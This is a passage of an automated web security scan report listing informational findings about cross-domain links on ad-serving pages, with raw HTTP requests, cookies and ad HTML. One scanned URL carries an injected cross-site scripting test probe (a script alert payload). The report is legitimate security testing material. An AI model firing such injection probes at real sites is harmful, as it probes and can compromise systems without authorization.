<A HREF="http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=http://ad-emea.doubleclick.net/jump/N5506.150290.INVITEMEDIA/B5070033.24;abr=!ie4;abr=!ie5;sz=300x250;ord=1296659628?">
<IMG SRC="http://ad-emea.doubleclick.net/ad/N5506.150290.INVITEMEDIA/B5070033.24;abr=!ie4;abr=!ie5;sz=300x250;ord=1296659628?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
</NOSCRIPT>
</IFRAME> <img src='http://t.invitemedia.com/track_imp?partnerID=219&campID=67677&crID=87798&auctionID=12966596281452839-87798&cost=0.3868&pubICode=1502951&pub=58661&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=219" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...

17.47. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890

The response contains the following links to other domains:

http://ad-emea.doubleclick.net/ad/N5506.150290.INVITEMEDIA/B5070033;abr=!ie4;abr=!ie5;sz=300x250;ord=1296659838?
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838?
http://ad-emea.doubleclick.net/adj/N5506.150290.INVITEMEDIA/B5070033;abr=!ie;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838?
http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http://ad-emea.doubleclick.net/jump/N5506.150290.INVITEMEDIA/B5070033;abr=!ie4;abr=!ie5;sz=300x250;ord=1296659838?
http://pixel.invitemedia.com/data_sync?partner_id=219
http://t.invitemedia.com/track_imp?partnerID=219&campID=52754&crID=73583&auctionID=12966598381452862-73583&cost=0.3366&pubICode=1502951&pub=58661&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F

Request

GET /iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/dmd.ehow/homepage;vid=0;ugc=0;lvl=4;sz=300x250;rsi=;tile=2;ord=8766312252264?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!3!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL"; bh="b!!!#p!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!,D(!!!!#<kI5F!!-?2!!!!'<kI5F!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!%<kI5F!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!#<k2yw!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!$<kI5F!!4<u!!!!%<kI5F!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!?VS!!ErC<k0fB!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!Mr(!!ErC<k0fB!!OgU!!!!$<kI5F!!Zwb!!!!#<kI5F!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!iEC!!!!#<kI5F!!iEb!!!!%<kI5F!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!v:e!!!!$<kI5F!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#+]S!!!!$<kI5F!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#1=E!!!!#<kI4S!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!#<jHAu!#3pv!!!!#<jHAu!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!'<kI5F!#8:i!!!!#<jc#c!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#I=D!!!!#<kjhR!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!(<lEIR!#MTF!!!!(<lEIR!#MTH!!!!(<lEIR!#MTI!!!!(<lEIR!#MTJ!!!!(<lEIR!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!$<kI5F!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#TnE!!!!$<lEIR!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!(<lEIR!#W^8!!!!#<jem(!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!'<kI5F!#Zmf!!!!$<kT`F!#]!g!!!!#<gj@R!#]Ky!!!!#<gj@R!#^0$!!!!$<kI5F!#^0%!!!!$<kI5F!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!%<kI5F!#fBk!!!!%<kI5F!#fBm!!!!%<kI5F!#fBn!!!!%<kI5F!#fBu!!!!#<gj@R!#fG+!!!!%<kI5F!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!$<kI5F!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#ndJ!!!!#<k2yx!#ndP!!!!#<k2yx!#nda!!!!#<k2yx!#ne$!!!!#<k2yx!#p]T!!!!$<kL2n"; ih="b!!!!>!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!08r)!!!!#<lEKV!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; vuday1=_UO8P5_x-e!>[UW756[*; lifb=%y_Qs7i<Qa>BiQOJap]Thmj[)

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:17:18 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: ad0266.2rm.ac4
Set-Cookie: ih="b!!!!?!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!->h]!!!!#<htSD!-g#y!!!!#<k:[]!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!#<lEMY!/J`3!!!!#<jbND!/c)/!!!!#<h67=!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!08r)!!!!#<lEKV!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; path=/; expires=Fri, 01-Feb-2013 15:17:18 GMT
Set-Cookie: vuday1=_UO8P5_x-f!>[UWD3HWE; path=/; expires=Thu, 03-Feb-2011 00:00:00 GMT
Set-Cookie: lifb=B>d/Q`skV@%y_Qs7i<Qa>BiQOJap]THY-om; path=/; expires=Wed, 02-Feb-2011 20:10:40 GMT
Cache-Control: no-store
Last-Modified: Wed, 02 Feb 2011 15:17:18 GMT
Pragma: no-cache
Content-Length: 3821
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(7648553);}
</script><IFRAME SRC="http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad-emea.doubleclick.net/adj/N5506.150290.INVITEMEDIA/B5070033;abr=!ie;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http://ad-emea.doubleclick.net/jump/N5506.150290.INVITEMEDIA/B5070033;abr=!ie4;abr=!ie5;sz=300x250;ord=1296659838?">
<IMG SRC="http://ad-emea.doubleclick.net/ad/N5506.150290.INVITEMEDIA/B5070033;abr=!ie4;abr=!ie5;sz=300x250;ord=1296659838?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
</NOSCRIPT>
</IFRAME> <img src='http://t.invitemedia.com/track_imp?partnerID=219&campID=52754&crID=73583&auctionID=12966598381452862-73583&cost=0.3366&pubICode=1502951&pub=58661&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=219" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...

17.48. http://ad.yieldmanager.com/iframe3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/iframe3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/iframe3?NwQAAJTyAgBNPHwAAAAAAO4WAgAAAAAAAAAYAAIAAAAAAAkAAQAECpeUBAAAAAAATZMEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTFWGxbV2SCR52Bg8XhQfZx71zidmmMWslfJurAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers6f361%2522__________script_____alert%281%29_____%2Fscript_____7e001703d00%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%25,Z%3D300x250%26e%3D58661%26I%3Dcomputers6f361%26_salt%3D4124589270%26B%3D10%26u%3Dhttp%253A%252F%252Fad.doubleclick.net%252Fadi%252Fdmd.ehow%252Fcomputers6f361%252522__________script_____alert%281%29_____%252Fscript_____7e001703d00%253Bcat%253Dcomputersoftware%253Bscat%253D%253Bsscat%253D%253Bart%253D%253Bqg%253D%253Btc%253D%253Bvid%253D0%253Bctype%253Darticles%253Bugc%253D0%253Blvl%253D1%253Brsi%25%26r%3D1,91e330d6-2ee1-11e0-be92-003048d6d03a

The response contains the following links to other domains:

http://ad.thewheelof.com/clk?2,13%3Be14bf62984e216d2%3B12de70063aa,0%3B%3B%3B2600164045,NwQAAJTyAgBNPHwAAAAAAO4WAgAAAAAAAAAYAAIAAAAAAAkAAQAECpeUBAAAAAAATZMEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOrwEAAAAAAAIAAgAAAAAAqmMA5y0BAAAAAAAAADkxZTMzMGQ2LTJlZTEtMTFlMC1iZTkyLTAwMzA0OGQ2ZDAzYQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers6f361%2522__________script_____alert%281%29_____%2Fscript_____7e001703d00%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%25,http://www.ehow.com/ehow-money/blog/
http://content.yieldmanager.edgesuite.net/atoms/d5/e0/39/58/d5e03958783f691851ab4d35100d1e63.jpg

Request

